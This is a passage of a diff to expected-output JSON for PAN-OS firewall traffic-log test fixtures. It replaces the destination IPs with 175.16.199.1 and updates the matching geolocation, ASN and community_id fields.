"2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -5185,24 +5184,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -5221,7 +5222,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5255,7 +5256,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SxifLhXvL8EiCuMvSbDcRARZyRw=", + "community_id": "1:nAnmGdMFfDqRmIrYyKMnd6BjTJs=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -5293,14 +5294,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284062105Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381827300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5323,24 +5324,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { 
@@ -5359,7 +5362,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -5393,7 +5396,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QYDqyZAUrBKpnIVn+epBn1ew/so=", + "community_id": "1:4WykhpqCfbAEFq4apGSBZIH0IVE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -5431,14 +5434,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284066698Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381832600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -5461,24 +5464,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 111, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -5494,7 +5499,7 @@ "packets": 1, "ip": "192.168.0.100" }, - "message": "192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -5528,7 +5533,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:shHCpyazCigToSNjn/e4N7P4biU=", + "community_id": "1:pMMIMicfrENbfeypsdzAPcSdfIs=", "transport": "udp", "application": "dns", "type": "ipv4", 
@@ -5560,14 +5565,14 @@ "related": { "ip": [ "192.168.0.100", - "8.8.8.8", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284071298Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381837900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5590,24 +5595,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { 
@@ -5626,7 +5633,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -5660,7 +5667,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cDqhuLJdpDu0NsYQNFC3GAMS3GQ=", + "community_id": "1:02TjEb0OqywqXGjLpyI51uH+t/w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -5698,14 +5705,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284075786Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381843300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5728,27 +5735,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5013, - "ip": "50.19.102.116", + "ip": "175.16.199.1", "packets": 7 }, "rule": { 
@@ -5764,7 +5770,7 @@ "packets": 10, "ip": "192.168.0.100" }, - "message": "192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "panw": { "panos": { "ruleset": "rule1", @@ -5798,7 +5804,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uf1iUYRFFiUYttG2AFf4pcXOdjw=", + "community_id": "1:Wa7URc5B1Rweuyc9rokTLSDwQzw=", "transport": "tcp", "application": "paloalto-wildfire-cloud", "type": "ipv4", 
@@ -5830,14 +5836,14 @@ "related": { "ip": [ "192.168.0.100", - "50.19.102.116", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284086434Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", + "ingested": "2021-12-09T13:43:22.381848600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -5860,27 +5866,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40026, "bytes": 99, - "ip": "65.55.223.19", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -5899,7 +5904,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -5933,7 +5938,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XF4dVSWPB46mtqr78f9EFUDEn6I=", + "community_id": "1:g7qob3exQkQiBYzG9yw7uxGwGQg=", "transport": "udp", "application": "skype-probe", "type": "ipv4", @@ -5971,14 +5976,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.19", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284091140Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381853900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -6001,27 +6006,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -78.1539, - "lat": 38.7095 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8075, + "number": 4837, "organization": { - "name": "Microsoft Corporation" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 40029, "bytes": 902, - "ip": "65.55.223.24", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -6040,7 +6044,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -6074,7 +6078,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HEEGx0vjlpNA8Pw0s6pBr2v0rpo=", + "community_id": "1:jyuZs3bE9DC94tX+dmoKKQuCNTo=", "transport": "udp", "application": "skype-probe", "type": "ipv4", 
@@ -6112,14 +6116,14 @@ ], "ip": [ "192.168.0.2", - "65.55.223.24", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284095716Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381859300Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6142,24 +6146,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 141, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -6175,7 +6181,7 @@ "packets": 1, "ip": "192.168.0.100" }, - "message": "192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -6209,7 +6215,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1CvVfwyezBZcR2u+VcrEzfuQK9s=", + "community_id": "1:OzPcYfTB9qZdptdWIWtui31Th2Q=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -6241,14 +6247,14 @@ "related": { "ip": [ "192.168.0.100", - "8.8.8.8", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284100488Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381864600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", 
@@ -6271,27 +6277,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6310,7 +6315,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -6344,7 +6349,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=", + "community_id": "1:jTZdxPnMPc+sLaxgXFcrsz+OuvQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", 
@@ -6382,14 +6387,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284105240Z",
- "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "ingested": "2021-12-09T13:43:22.381867900Z",
+ "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:22.000-04:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -6412,24 +6417,26 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 209,
+ "number": 4837,
 "organization": {
- "name": "CenturyLink Communications, LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 0,
- "ip": "205.171.2.25",
+ "ip": "175.16.199.1",
 "packets": 0
 },
 "rule": { 
@@ -6448,7 +6455,7 @@
 },
 "packets": 1
 },
- "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -6482,7 +6489,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:K6PPTb7ohj/4wQV86uCrgAF1mcY=",
+ "community_id": "1:HfZACBDWHwkWPdpUmvEFlSZI2N4=",
 "transport": "udp",
 "application": "dns",
 "type": "ipv4",
@@ -6520,14 +6527,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "205.171.2.25",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:38:09.284109909Z",
